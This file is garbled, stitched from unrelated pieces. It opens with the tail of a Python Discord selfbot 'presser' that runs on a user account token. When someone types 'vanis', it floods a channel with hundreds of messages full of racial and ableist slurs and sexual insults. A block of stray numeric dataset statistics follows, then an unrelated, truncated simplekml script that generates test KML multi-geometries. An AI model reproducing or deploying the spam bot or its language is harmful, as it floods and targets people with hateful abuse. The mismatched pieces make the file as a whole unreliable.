╦ ╦╦ ╦╦═╗╔═╗╦ ╦ ╔═╗╦═╗╔═╗╔═╗╔═╗╔═╗╦═╗
╚╦╝║ ║╠╦╝║ ║║ ║ ╠═╝╠╦╝║╣ ╚═╗╚═╗║╣ ╠╦╝
╩ ╚═╝╩╚═╚═╝╚═╝ ╩ ╩╚═╚═╝╚═╝╚═╝╚═╝╩╚═
╚════════════════════════════════════════════╝
To use the presser, type "vanis" in the chat to
activate it.
""")
@vanis.event
async def on_message(message):
channel = message.channel
if message.content.endswith('vanis'):
await message.channel.send ('YOU WEAK BITCH KEEP UP WITH ME')
await message.channel.send ('KEEP CHAT MOVING SON')
await message.channel.send ('NO BREAKS FOR YOU KEEP ON GOING SON')
await message.channel.send ('WHY YOU SLOWING DOWN KEEP IT GOING')
await message.channel.send ('WEAK FUCKING BITCH')
await message.channel.send ('FUCKING RETARD DOESNT KNOW WHAT TO SAY')
await message.channel.send ('YOU SUCK PUSSY')
await message.channel.send ('LMFAOOO SHOULD I GIVE MY SON A CHANCE')
await message.channel.send ('WEAK ASS BITCH FOCUS UP SON')
await message.channel.send ('PRAY YOU WONT FOLD TONIGHT')
await message.channel.send ('LMFAOAOAOAO')
await message.channel.send ('WEAK ASS FUCKING TROLL CANT PRESS ME')
await message.channel.send ('FOCUS LOLL UR ASS')
await message.channel.send ('DUMBASS WEAK TROLL')
await message.channel.send ('LOL FUCKING RETARDED BITCH')
await message.channel.send ('DUMB BITCH YOU FEAR ME')
await message.channel.send ('FUCKING TROLL')
await message.channel.send ('U CANT PRESSURE ME')
await message.channel.send ('1')
await message.channel.send ('UR A SKID LOOLOOLOL')
await message.channel.send ('DONT GET TIRED')
await message.channel.send ('LOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOL')
await message.channel.send ('LLOLOLOLOLOLOLLLOO')
await message.channel.send ('LOOLLOLOLO')
await message.channel.send ('LOLL')
await message.channel.send ('YOU FUCKING SUCK LAME ASS NIGGA')
await message.channel.send ('YOU WEAK BITCH KEEP UP WITH ME')
await message.channel.send ('KEEP CHAT MOVING SON')
await message.channel.send ('NO BREAKS FOR YOU KEEP ON GOING SON')
await message.channel.send ('WHY YOU SLOWING DOWN KEEP IT GOING')
await message.channel.send ('WEAK FUCKING BITCH')
await message.channel.send ('FUCKING RETARD DOESNT KNOW WHAT TO SAY')
await message.channel.send ('YOU SUCK PUSSY')
await message.channel.send ('LMFAOOO SHOULD I GIVE MY SON A CHANCE')
await message.channel.send ('WEAK ASS BITCH FOCUS UP SON')
await message.channel.send ('PRAY YOU WONT FOLD TONIGHT')
await message.channel.send ('LMFAOAOAOAO')
await message.channel.send ('WEAK ASS FUCKING TROLL CANT PRESS ME')
await message.channel.send ('FOCUS LOLL UR ASS')
await message.channel.send ('DUMBASS WEAK TROLL')
await message.channel.send ('LOL FUCKING RETARDED BITCH')
await message.channel.send ('DUMB BITCH YOU FEAR ME')
await message.channel.send ('FUCKING TROLL')
await message.channel.send ('U CANT PRESSURE ME')
await message.channel.send ('1')
await message.channel.send ('UR A SKID LOOLOOLOL')
await message.channel.send ('DONT GET TIRED')
await message.channel.send ('LOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOL')
await message.channel.send ('LLOLOLOLOLOLOLLLOO')
await message.channel.send ('LOOLLOLOLO')
await message.channel.send ('LOLL')
await message.channel.send ('YOU FUCKING SUCK LAME ASS NIGGA')
await message.channel.send ('YOUR SO BAD LOOOOL')
await message.channel.send ('LAME ASS NIGGA U CANT KEEP UP WITH ME')
await message.channel.send ('YOUR SO BAD LOOOOL')
await message.channel.send ('LAME ASS NIGGA U CANT KEEP UP WITH ME')
await message.channel.send ('ASS')
await message.channel.send ('LOOLLOLOLO')
await message.channel.send ('LOLL')
await message.channel.send ('YOU FUCKING SUCK LAME ASS NIGGA')
await message.channel.send ('YOUR SO BAD LOOOOL')
await message.channel.send ('LAME ASS NIGGA U CANT KEEP UP WITH ME')
await message.channel.send ('ASS')
await message.channel.send ('BITCH')
await message.channel.send ('LOO')
await message.channel.send ('LLOL')
await message.channel.send ('LO')
await message.channel.send ('COME')
await message.channel.send ('LETS')
await message.channel.send ('SKID RETARDED ASS NIGGA UR SO SHIT')
await message.channel.send ('LOOOOOOOOOOOOOOOOOLLLLLLLLLOOOOOOOOOL')
await message.channel.send ('LOOOOOOOOOOOOOOL')
await message.channel.send ('OOOOOOOOOLOLO')
await message.channel.send ('OLOLOLOLOLOL')
await message.channel.send ('FOLOLLOLOLOLO')
await message.channel.send ('ASS')
await message.channel.send ('YOU WEAK BITCH KEEP UP WITH ME')
await message.channel.send ('KEEP CHAT MOVING SON')
await message.channel.send ('BITCH')
await message.channel.send ('LOO')
await message.channel.send ('LLOL')
await message.channel.send ('LO')
await message.channel.send ('COME')
await message.channel.send ('LETS')
await message.channel.send ('SKID RETARDED ASS NIGGA UR SO SHIT')
await message.channel.send ('LOOOOOOOOOOOOOOOOOLLLLLLLLLOOOOOOOOOL')
await message.channel.send ('LOOOOOOOOOOOOOOL')
await message.channel.send ('OOOOOOOOOLOLO')
await message.channel.send ('OLOLOLOLOLOL')
await message.channel.send ('FOLOLLOLOLOLO')
await message.channel.send ('ASS')
await message.channel.send ('YOU WEAK BITCH KEEP UP WITH ME')
await message.channel.send ('KEEP CHAT MOVING SON')
await message.channel.send ('NO BREAKS FOR YOU KEEP ON GOING SON')
await message.channel.send ('WHY YOU SLOWING DOWN KEEP IT GOING')
await message.channel.send ('WEAK FUCKING BITCH')
await message.channel.send ('FUCKING RETARD DOESNT KNOW WHAT TO SAY')
await message.channel.send ('YOU SUCK PUSSY')
await message.channel.send ('LMFAOOO SHOULD I GIVE MY SON A CHANCE')
await message.channel.send ('WEAK ASS BITCH FOCUS UP SON')
await message.channel.send ('PRAY YOU WONT FOLD TONIGHT')
await message.channel.send ('LMFAOAOAOAO')
await message.channel.send ('WEAK ASS FUCKING TROLL CANT PRESS ME')
await message.channel.send ('FOCUS LOLL UR ASS')
await message.channel.send ('DUMBASS WEAK TROLL')
await message.channel.send ('LOL FUCKING RETARDED BITCH')
await message.channel.send ('DUMB BITCH YOU FEAR ME')
await message.channel.send ('FUCKING TROLL')
await message.channel.send ('BITCH')
await message.channel.send ('LOLO')
await message.channel.send ('LOOL')
await message.channel.send ('OLOL')
await message.channel.send ('LOLO')
await message.channel.send ('DONT STOP')
await message.channel.send ('SPAMMING')
await message.channel.send ('LAME ASS NIGGA UR SO ASS LOOOOOL')
await message.channel.send ('WEAK ASS BITCH UR SO SHIT')
await message.channel.send ('WEAK ASS NIGGA')
await message.channel.send ('UR SO SHIT LOOOOOLL')
await message.channel.send ('KEEP PACKING SON DONT STOP')
await message.channel.send ('FOCUS SON DONT FOLD LOOOOL UR ASS')
await message.channel.send ('WEAK ASS BITCH YOU CANT LAST WITH ME')
await message.channel.send ('WHY DO YOU FEAR ME SO MUCH SON?')
await message.channel.send ('HE CANT KEEP UP WITH ME')
await message.channel.send ('HES MY JR LMFAOAOAOA')
await message.channel.send ('FREAK DOESNT KNOW WHAT HE GOT HIMSELF INTO')
await message.channel.send ('MY SON IS CRYING RN HE SLOWING DOWN')
await message.channel.send ('HES GETTING HAND CRAMPS')
await message.channel.send ('FOCUS UP SON FUCKING WEAK TROLL')
await message.channel.send ('WEAK BITCH STOP DUCKING ME SON U CANT PRESS ME U SUCK')
await message.channel.send ('LOOOL')
await message.channel.send ('OL')
await message.channel.send ('YOU WEAK BITCH KEEP UP WITH ME')
await message.channel.send ('KEEP CHAT MOVING SON')
await message.channel.send ('NO BREAKS FOR YOU KEEP ON GOING SON')
await message.channel.send ('WHY YOU SLOWING DOWN KEEP IT GOING')
await message.channel.send ('WEAK FUCKING BITCH')
await message.channel.send ('FUCKING RETARD DOESNT KNOW WHAT TO SAY')
await message.channel.send ('YOU SUCK PUSSY')
await message.channel.send ('LMFAOOO SHOULD I GIVE MY SON A CHANCE')
await message.channel.send ('WEAK ASS BITCH FOCUS UP SON')
await message.channel.send ('PRAY YOU WONT FOLD TONIGHT')
await message.channel.send ('LMFAOAOAOAO')
await message.channel.send ('WEAK ASS FUCKING TROLL CANT PRESS ME')
await message.channel.send ('FOCUS LOLL UR ASS')
await message.channel.send ('DUMBASS WEAK TROLL')
await message.channel.send ('LOL FUCKING RETARDED BITCH')
await message.channel.send ('DUMB BITCH YOU FEAR ME')
await message.channel.send ('FUCKING TROLL')
await message.channel.send ('U CANT PRESSURE ME')
await message.channel.send ('1')
await message.channel.send ('UR A SKID LOOLOOLOL')
await message.channel.send ('DONT GET TIRED')
await message.channel.send ('LOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOL')
await message.channel.send ('LLOLOLOLOLOLOLLLOO')
await message.channel.send ('LOOLLOLOLO')
await message.channel.send ('YOU WEAK BITCH KEEP UP WITH ME')
await message.channel.send ('KEEP CHAT MOVING SON')
await message.channel.send ('NO BREAKS FOR YOU KEEP ON GOING SON')
await message.channel.send ('WHY YOU SLOWING DOWN KEEP IT GOING')
await message.channel.send ('WEAK FUCKING BITCH')
await message.channel.send ('FUCKING RETARD DOESNT KNOW WHAT TO SAY')
await message.channel.send ('YOU SUCK PUSSY')
await message.channel.send ('LMFAOOO SHOULD I GIVE MY SON A CHANCE')
await message.channel.send ('WEAK ASS BITCH FOCUS UP SON')
await message.channel.send ('PRAY YOU WONT FOLD TONIGHT')
await message.channel.send ('LMFAOAOAOAO')
await message.channel.send ('WEAK ASS FUCKING TROLL CANT PRESS ME')
await message.channel.send ('FOCUS LOLL UR ASS')
await message.channel.send ('DUMBASS WEAK TROLL')
await message.channel.send ('LOL FUCKING RETARDED BITCH')
await message.channel.send ('DUMB BITCH YOU FEAR ME')
await message.channel.send ('FUCKING TROLL')
await message.channel.send ('U CANT PRESSURE ME')
await message.channel.send ('1')
await message.channel.send ('UR A SKID LOOLOOLOL')
await message.channel.send ('DONT GET TIRED')
await message.channel.send ('LOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOL')
await message.channel.send ('LLOLOLOLOLOLOLLLOO')
await message.channel.send ('LOOLLOLOLO')
await message.channel.send ('L')
await message.channel.send ('OLO')
await message.channel.send ('LO')
await message.channel.send ('O')
await message.channel.send ('LOLOLO')
await message.channel.send ('L')
await message.channel.send ('YOU WEAK BITCH KEEP UP WITH ME')
await message.channel.send ('KEEP CHAT MOVING SON')
await message.channel.send ('NO BREAKS FOR YOU KEEP ON GOING SON')
await message.channel.send ('WHY YOU SLOWING DOWN KEEP IT GOING')
await message.channel.send ('WEAK FUCKING BITCH')
await message.channel.send ('FUCKING RETARD DOESNT KNOW WHAT TO SAY')
await message.channel.send ('YOU SUCK PUSSY')
await message.channel.send ('LMFAOOO SHOULD I GIVE MY SON A CHANCE')
await message.channel.send ('WEAK ASS BITCH FOCUS UP SON')
await message.channel.send ('PRAY YOU WONT FOLD TONIGHT')
await message.channel.send ('LMFAOAOAOAO')
await message.channel.send ('WEAK ASS FUCKING TROLL CANT PRESS ME')
await message.channel.send ('FOCUS LOLL UR ASS')
await message.channel.send ('DUMBASS WEAK TROLL')
await message.channel.send ('LOL FUCKING RETARDED BITCH')
await message.channel.send ('DUMB BITCH YOU FEAR ME')
await message.channel.send ('FUCKING TROLL')
await message.channel.send ('SHUT')
await message.channel.send ('THE')
await message.channel.send ('FUCK')
await message.channel.send ('UP')
await message.channel.send ('AND')
await message.channel.send ('COME')
await message.channel.send ('MAKE A PRINT YOU SKIDDDDDDDDDD LOLLLLLLLLLLLLLLLL')
await message.channel.send ('FUCKING')
await message.channel.send ('PUSSY')
await message.channel.send ('YOU')
await message.channel.send ('SUCK')
await message.channel.send ('FREAK DOESNT KNOW WHAT HE GOT HIMSELF INTO')
await message.channel.send ('MY SON IS CRYING RN HE SLOWING DOWN')
await message.channel.send ('HES GETTING HAND CRAMPS')
await message.channel.send ('FOCUS UP SON FUCKING WEAK TROLL')
await message.channel.send ('WEAK BITCH STOP DUCKING ME SON U CANT PRESS ME U SUCK')
await message.channel.send ('LOOOL')
await message.channel.send ('OL')
await message.channel.send ('L')
await message.channel.send ('OLO')
await message.channel.send ('LO')
await message.channel.send ('O')
await message.channel.send ('LOLOLO')
await message.channel.send ('L')
await message.channel.send ('YOU WEAK BITCH KEEP UP WITH ME')
await message.channel.send ('KEEP CHAT MOVING SON')
await message.channel.send ('NO BREAKS FOR YOU KEEP ON GOING SON')
await message.channel.send ('WHY YOU SLOWING DOWN KEEP IT GOING')
await message.channel.send ('WEAK FUCKING BITCH')
await message.channel.send ('FUCKING RETARD DOESNT KNOW WHAT TO SAY')
await message.channel.send ('YOU SUCK PUSSY')
await message.channel.send ('LMFAOOO SHOULD I GIVE MY SON A CHANCE')
await message.channel.send ('WEAK ASS BITCH FOCUS UP SON')
await message.channel.send ('PRAY YOU WONT FOLD TONIGHT')
await message.channel.send ('LMFAOAOAOAO')
await message.channel.send ('WEAK ASS FUCKING TROLL CANT PRESS ME')
await message.channel.send ('FOCUS LOLL UR ASS')
await message.channel.send ('DUMBASS WEAK TROLL')
await message.channel.send ('LOL FUCKING RETARDED BITCH')
await message.channel.send ('DUMB BITCH YOU FEAR ME')
await message.channel.send ('FUCKING TROLL')
await message.channel.send ('SHUT')
await message.channel.send ('THE')
await message.channel.send ('FUCK')
await message.channel.send ('UP')
await message.channel.send ('AND')
await message.channel.send ('COME')
await message.channel.send ('MAKE A PRINT YOU SKIDDDDDDDDDD LOLLLLLLLLLLLLLLLL')
await message.channel.send ('FUCKING')
await message.channel.send ('PUSSY')
await message.channel.send ('YOU')
await message.channel.send ('SUCK')
await message.channel.send ('FREAK DOESNT KNOW WHAT HE GOT HIMSELF INTO')
await message.channel.send ('MY SON IS CRYING RN HE SLOWING DOWN')
await message.channel.send ('HES GETTING HAND CRAMPS')
await message.channel.send ('FOCUS UP SON FUCKING WEAK TROLL')
await message.channel.send ('WEAK BITCH STOP DUCKING ME SON U CANT PRESS ME U SUCK')
await message.channel.send ('LOOOL')
await message.channel.send ('OL')
await message.channel.send ('L')
await message.channel.send ('OLO')
await message.channel.send ('LO')
await message.channel.send ('O')
await message.channel.send ('LOLOLO')
await message.channel.send ('L')
await message.channel.send ('YOU WEAK BITCH KEEP UP WITH ME')
await message.channel.send ('KEEP CHAT MOVING SON')
await message.channel.send ('NO BREAKS FOR YOU KEEP ON GOING SON')
await message.channel.send ('WHY YOU SLOWING DOWN KEEP IT GOING')
await message.channel.send ('WEAK FUCKING BITCH')
await message.channel.send ('FUCKING RETARD DOESNT KNOW WHAT TO SAY')
await message.channel.send ('YOU SUCK PUSSY')
await message.channel.send ('LMFAOOO SHOULD I GIVE MY SON A CHANCE')
await message.channel.send ('WEAK ASS BITCH FOCUS UP SON')
await message.channel.send ('PRAY YOU WONT FOLD TONIGHT')
await message.channel.send ('LMFAOAOAOAO')
await message.channel.send ('WEAK ASS FUCKING TROLL CANT PRESS ME')
await message.channel.send ('FOCUS LOLL UR ASS')
await message.channel.send ('DUMBASS WEAK TROLL')
await message.channel.send ('LOL FUCKING RETARDED BITCH')
await message.channel.send ('DUMB BITCH YOU FEAR ME')
await message.channel.send ('FUCKING TROLL')
await message.channel.send ('SHUT')
await message.channel.send ('THE')
await message.channel.send ('FUCK')
await message.channel.send ('UP')
await message.channel.send ('AND')
await message.channel.send ('COME')
await message.channel.send ('MAKE A PRINT YOU SKIDDDDDDDDDD LOLLLLLLLLLLLLLLLL')
await message.channel.send ('FUCKING')
await message.channel.send ('PUSSY')
await message.channel.send ('YOU')
await message.channel.send ('SUCK')
await message.channel.send ('FREAK DOESNT KNOW WHAT HE GOT HIMSELF INTO')
await message.channel.send ('MY SON IS CRYING RN HE SLOWING DOWN')
await message.channel.send ('HES GETTING HAND CRAMPS')
await message.channel.send ('FOCUS UP SON FUCKING WEAK TROLL')
await message.channel.send ('WEAK BITCH STOP DUCKING ME SON U CANT PRESS ME U SUCK')
await message.channel.send ('LOOOL')
await message.channel.send ('OL')
await message.channel.send ('L')
await message.channel.send ('OLO')
await message.channel.send ('LO')
await message.channel.send ('O')
await message.channel.send ('LOLOLO')
await message.channel.send ('L')
await message.channel.send ('YOU WEAK BITCH KEEP UP WITH ME')
await message.channel.send ('KEEP CHAT MOVING SON')
await message.channel.send ('NO BREAKS FOR YOU KEEP ON GOING SON')
await message.channel.send ('WHY YOU SLOWING DOWN KEEP IT GOING')
await message.channel.send ('WEAK FUCKING BITCH')
await message.channel.send ('FUCKING RETARD DOESNT KNOW WHAT TO SAY')
await message.channel.send ('YOU SUCK PUSSY')
await message.channel.send ('LMFAOOO SHOULD I GIVE MY SON A CHANCE')
await message.channel.send ('WEAK ASS BITCH FOCUS UP SON')
await message.channel.send ('PRAY YOU WONT FOLD TONIGHT')
await message.channel.send ('LMFAOAOAOAO')
await message.channel.send ('WEAK ASS FUCKING TROLL CANT PRESS ME')
await message.channel.send ('FOCUS LOLL UR ASS')
await message.channel.send ('DUMBASS WEAK TROLL')
await message.channel.send ('LOL FUCKING RETARDED BITCH')
await message.channel.send ('DUMB BITCH YOU FEAR ME')
await message.channel.send ('FUCKING TROLL')
await message.channel.send ('SHUT')
await message.channel.send ('THE')
await message.channel.send ('FUCK')
await message.channel.send ('UP')
await message.channel.send ('AND')
await message.channel.send ('COME')
await message.channel.send ('MAKE A PRINT YOU SKIDDDDDDDDDD LOLLLLLLLLLLLLLLLL')
await message.channel.send ('FUCKING')
await message.channel.send ('PUSSY')
await message.channel.send ('YOU')
await message.channel.send ('SUCK')
await message.channel.send ('YOU WEAK BITCH KEEP UP WITH ME')
await message.channel.send ('KEEP CHAT MOVING SON')
await message.channel.send ('NO BREAKS FOR YOU KEEP ON GOING SON')
await message.channel.send ('WHY YOU SLOWING DOWN KEEP IT GOING')
await message.channel.send ('WEAK FUCKING BITCH')
await message.channel.send ('FUCKING RETARD DOESNT KNOW WHAT TO SAY')
await message.channel.send ('YOU SUCK PUSSY')
await message.channel.send ('LMFAOOO SHOULD I GIVE MY SON A CHANCE')
await message.channel.send ('WEAK ASS BITCH FOCUS UP SON')
await message.channel.send ('PRAY YOU WONT FOLD TONIGHT')
await message.channel.send ('LMFAOAOAOAO')
await message.channel.send ('WEAK ASS FUCKING TROLL CANT PRESS ME')
await message.channel.send ('FOCUS LOLL UR ASS')
await message.channel.send ('DUMBASS WEAK TROLL')
await message.channel.send ('LOL FUCKING RETARDED BITCH')
await message.channel.send ('DUMB BITCH YOU FEAR ME')
await message.channel.send ('FUCKING TROLL')
await message.channel.send ('U CANT PRESSURE ME')
await message.channel.send ('1')
await message.channel.send ('UR A SKID LOOLOOLOL')
await message.channel.send ('DONT GET TIRED')
await message.channel.send ('LOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOL')
await message.channel.send ('LLOLOLOLOLOLOLLLOO')
await message.channel.send ('LOOLLOLOLO')
vanis.run(token, bot=False)
| 56.301266
| 92
| 0.661361
| 2,889
| 22,239
| 5.154033
| 0.062305
| 0.341303
| 0.460645
| 0.557623
| 0.953593
| 0.946474
| 0.937676
| 0.928543
| 0.928543
| 0.918872
| 0
| 0.000583
| 0.229237
| 22,239
| 395
| 93
| 56.301266
| 0.857126
| 0
| 0
| 0.906494
| 0
| 0
| 0.329631
| 0.019649
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.005195
| 0
| 0.005195
| 0.002597
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
e15738d640f8c06baf57cdc5b0aee171a80306ea
| 10,206
|
py
|
Python
|
test/shapefiles/gen_multi_geometries.py
|
roelderickx/ogr2pbf
|
7ac99488d8daa9452e2a41e40bf2554dc720166d
|
[
"MIT"
] | null | null | null |
test/shapefiles/gen_multi_geometries.py
|
roelderickx/ogr2pbf
|
7ac99488d8daa9452e2a41e40bf2554dc720166d
|
[
"MIT"
] | null | null | null |
test/shapefiles/gen_multi_geometries.py
|
roelderickx/ogr2pbf
|
7ac99488d8daa9452e2a41e40bf2554dc720166d
|
[
"MIT"
] | null | null | null |
from simplekml import Kml, Color
kml = Kml(open=1)
# generate geometries
multipoint = kml.newmultigeometry(name="TestMultiPoint")
multipoint.newpoint(coords=[(-23.0967,33.4843)])
multipoint.newpoint(coords=[(-23.1061,33.4821)])
multipoint.newpoint(coords=[(-23.0975,33.4817)])
multilinestring = kml.newmultigeometry(name="TestMultiLinestring")
multilinestring.newlinestring(coords=[(-23.1393528,33.4886545),(-23.1372929,33.4908736),(-23.1354046,33.4923052),(-23.1326580,33.4933073),(-23.1289673,33.4938799),(-23.1253624,33.4945957),(-23.1232166,33.4956693),(-23.1216717,33.4970293),(-23.1198692,33.4986755),(-23.1191826,33.5002501)])
multilinestring.newlinestring(coords=[(-23.1383228,33.4876524),(-23.1366062,33.4888693),(-23.1350613,33.4897998),(-23.1324005,33.4913030),(-23.1293964,33.4920904),(-23.1259632,33.4924483),(-23.1233883,33.4932357),(-23.1211567,33.4943809),(-23.1192684,33.4950967),(-23.1157494,33.4956693),(-23.1130886,33.4952399),(-23.1100845,33.4943809),(-23.1072521,33.4945241),(-23.1044197,33.4956693),(-23.1022739,33.4966714),(-23.1011581,33.4981029),(-23.0999565,33.4993912)])
multilinestring.newlinestring(coords=[(-23.1362629,33.4940946),(-23.1372070,33.4928778),(-23.1397820,33.4918041),(-23.1425285,33.4906588),(-23.1438160,33.4887977),(-23.1434727,33.4865070),(-23.1419277,33.4847890),(-23.1367779,33.4840731),(-23.1336021,33.4856480),(-23.1317139,33.4877240),(-23.1293106,33.4897283),(-23.1266499,33.4902293),(-23.1219292,33.4916609),(-23.1195259,33.4907304),(-23.1154060,33.4896567),(-23.1114578,33.4907304),(-23.1070805,33.4923052),(-23.1033897,33.4936652),(-23.0994415,33.4965998),(-23.0986691,33.4986039),(-23.0986691,33.5011805),(-23.1011581,33.5029698)])
multipolygon = kml.newmultigeometry(name="TestMultiPolygon")
polygon1 = multipolygon.newpolygon(name="TestPolygonOnlyOuter")
polygon1.outerboundaryis = [(-23.0895710,33.4706855),(-23.0868244,33.4729050),(-23.0818462,33.4744085),(-23.0760098,33.4738357),(-23.0727482,33.4737641),(-23.0702591,33.4745517),(-23.0689716,33.4755540),(-23.0683708,33.4769142),(-23.0689716,33.4778449),(-23.0709457,33.4772722),(-23.0737782,33.4761267),(-23.0778122,33.4772006),(-23.0790138,33.4786324),(-23.0786705,33.4804938),(-23.0774689,33.4819255),(-23.0756664,33.4823551),(-23.0742931,33.4837868),(-23.0740356,33.4856480),(-23.0724049,33.4870797),(-23.0697441,33.4884398),(-23.0687141,33.4880103),(-23.0688000,33.4871513),(-23.0714607,33.4854333),(-23.0706882,33.4832857),(-23.0691433,33.4851469),(-23.0657101,33.4849322),(-23.0639076,33.4828562),(-23.0632210,33.4807085),(-23.0631351,33.4784892),(-23.0640793,33.4761983),(-23.0651093,33.4744085),(-23.0671692,33.4720458),(-23.0712032,33.4707571),(-23.0739498,33.4701843),(-23.0764389,33.4683228),(-23.0767822,33.4663180),(-23.0761814,33.4645995),(-23.0739498,33.4629526),(-23.0709457,33.4612341),(-23.0704308,33.4593008),(-23.0710316,33.4572958),(-23.0728340,33.4566513),(-23.0755806,33.4560068),(-23.0778122,33.4557920),(-23.0811596,33.4557920),(-23.0843353,33.4557920),(-23.0881119,33.4538585),(-23.0901718,33.4522831),(-23.0922318,33.4504211),(-23.0954933,33.4503495),(-23.0985832,33.4521398),(-23.1007290,33.4550043),(-23.1036472,33.4558636),(-23.1075096,33.4570810),(-23.1108570,33.4576538),(-23.1130028,33.4590144),(-23.1141186,33.4615922),(-23.1143761,33.4643131),(-23.1085396,33.4653871),(-23.1037331,33.4678216),(-23.1018448,33.4711151),(-23.1021881,33.4731198),(-23.1040764,33.4762699),(-23.1037545,33.4773975),(-23.1026173,33.4777196),(-23.1014800,33.4775765),(-23.1007719,33.4771111),(-23.0985403,33.4760014),(-23.0971670,33.4756614),(-23.0961800,33.4753392),(-23.0914593,33.4720458),(-23.0895710,33.4706855)]
polygon2 = multipolygon.newpolygon(name="TestPolygonWithInner")
# outer
polygon2.outerboundaryis = [(-23.1465626,33.4720458),(-23.1454468,33.4739073),(-23.1457901,33.4752676),(-23.1480217,33.4779881),(-23.1473351,33.4812096),(-23.1423569,33.4823551),(-23.1374645,33.4820687),(-23.1346321,33.4826414),(-23.1316280,33.4851469),(-23.1281948,33.4873660),(-23.1245041,33.4866502),(-23.1205559,33.4845742),(-23.1206417,33.4812812),(-23.1218433,33.4776301),(-23.1249332,33.4771290),(-23.1258774,33.4756972),(-23.1254482,33.4739073),(-23.1239033,33.4731198),(-23.1209850,33.4714015),(-23.1181526,33.4716163),(-23.1160069,33.4726902),(-23.1136036,33.4758403),(-23.1112862,33.4777017),(-23.1087971,33.4777733),(-23.1060505,33.4766995),(-23.1045914,33.4750528),(-23.1034756,33.4726186),(-23.1031322,33.4710435),(-23.1037331,33.4693967),(-23.1070805,33.4675352),(-23.1100845,33.4663896),(-23.1137753,33.4657451),(-23.1207275,33.4653871),(-23.1247616,33.4640983),(-23.1266499,33.4624514),(-23.1287098,33.4604465),(-23.1337738,33.4598020),(-23.1372070,33.4599452),(-23.1396961,33.4611625),(-23.1433868,33.4640983),(-23.1451893,33.4664612),(-23.1485367,33.4683228),(-23.1465626,33.4720458)]
# inner
polygon2.innerboundaryis = [(-23.1359196,33.4741937),(-23.1382370,33.4729050),(-23.1374645,33.4711151),(-23.1354904,33.4698263),(-23.1334305,33.4704707),(-23.1333447,33.4723322),(-23.1342888,33.4739789),(-23.1359196,33.4741937)]
kml.save("multi_geometries.kml")
# generate duplicate geometries
multipointdup = kml.newmultigeometry(name="TestMultiPoint")
multipointdup.newpoint(coords=[(-23.0967,33.4843)])
multipointdup.newpoint(coords=[(-23.1061,33.4821)])
multipointdup.newpoint(coords=[(-23.0975,33.4817)])
multilinestringdup = kml.newmultigeometry(name="TestMultiLinestring")
multilinestringdup.newlinestring(coords=[(-23.1393528,33.4886545),(-23.1372929,33.4908736),(-23.1354046,33.4923052),(-23.1326580,33.4933073),(-23.1289673,33.4938799),(-23.1253624,33.4945957),(-23.1232166,33.4956693),(-23.1216717,33.4970293),(-23.1198692,33.4986755),(-23.1191826,33.5002501)])
multilinestringdup.newlinestring(coords=[(-23.1383228,33.4876524),(-23.1366062,33.4888693),(-23.1350613,33.4897998),(-23.1324005,33.4913030),(-23.1293964,33.4920904),(-23.1259632,33.4924483),(-23.1233883,33.4932357),(-23.1211567,33.4943809),(-23.1192684,33.4950967),(-23.1157494,33.4956693),(-23.1130886,33.4952399),(-23.1100845,33.4943809),(-23.1072521,33.4945241),(-23.1044197,33.4956693),(-23.1022739,33.4966714),(-23.1011581,33.4981029),(-23.0999565,33.4993912)])
multilinestringdup.newlinestring(coords=[(-23.1362629,33.4940946),(-23.1372070,33.4928778),(-23.1397820,33.4918041),(-23.1425285,33.4906588),(-23.1438160,33.4887977),(-23.1434727,33.4865070),(-23.1419277,33.4847890),(-23.1367779,33.4840731),(-23.1336021,33.4856480),(-23.1317139,33.4877240),(-23.1293106,33.4897283),(-23.1266499,33.4902293),(-23.1219292,33.4916609),(-23.1195259,33.4907304),(-23.1154060,33.4896567),(-23.1114578,33.4907304),(-23.1070805,33.4923052),(-23.1033897,33.4936652),(-23.0994415,33.4965998),(-23.0986691,33.4986039),(-23.0986691,33.5011805),(-23.1011581,33.5029698)])
multipolygondup = kml.newmultigeometry(name="TestMultiPolygon")
polygon1dup = multipolygondup.newpolygon(name="TestPolygonOnlyOuter")
polygon1dup.outerboundaryis = [(-23.0895710,33.4706855),(-23.0868244,33.4729050),(-23.0818462,33.4744085),(-23.0760098,33.4738357),(-23.0727482,33.4737641),(-23.0702591,33.4745517),(-23.0689716,33.4755540),(-23.0683708,33.4769142),(-23.0689716,33.4778449),(-23.0709457,33.4772722),(-23.0737782,33.4761267),(-23.0778122,33.4772006),(-23.0790138,33.4786324),(-23.0786705,33.4804938),(-23.0774689,33.4819255),(-23.0756664,33.4823551),(-23.0742931,33.4837868),(-23.0740356,33.4856480),(-23.0724049,33.4870797),(-23.0697441,33.4884398),(-23.0687141,33.4880103),(-23.0688000,33.4871513),(-23.0714607,33.4854333),(-23.0706882,33.4832857),(-23.0691433,33.4851469),(-23.0657101,33.4849322),(-23.0639076,33.4828562),(-23.0632210,33.4807085),(-23.0631351,33.4784892),(-23.0640793,33.4761983),(-23.0651093,33.4744085),(-23.0671692,33.4720458),(-23.0712032,33.4707571),(-23.0739498,33.4701843),(-23.0764389,33.4683228),(-23.0767822,33.4663180),(-23.0761814,33.4645995),(-23.0739498,33.4629526),(-23.0709457,33.4612341),(-23.0704308,33.4593008),(-23.0710316,33.4572958),(-23.0728340,33.4566513),(-23.0755806,33.4560068),(-23.0778122,33.4557920),(-23.0811596,33.4557920),(-23.0843353,33.4557920),(-23.0881119,33.4538585),(-23.0901718,33.4522831),(-23.0922318,33.4504211),(-23.0954933,33.4503495),(-23.0985832,33.4521398),(-23.1007290,33.4550043),(-23.1036472,33.4558636),(-23.1075096,33.4570810),(-23.1108570,33.4576538),(-23.1130028,33.4590144),(-23.1141186,33.4615922),(-23.1143761,33.4643131),(-23.1085396,33.4653871),(-23.1037331,33.4678216),(-23.1018448,33.4711151),(-23.1021881,33.4731198),(-23.1040764,33.4762699),(-23.1037545,33.4773975),(-23.1026173,33.4777196),(-2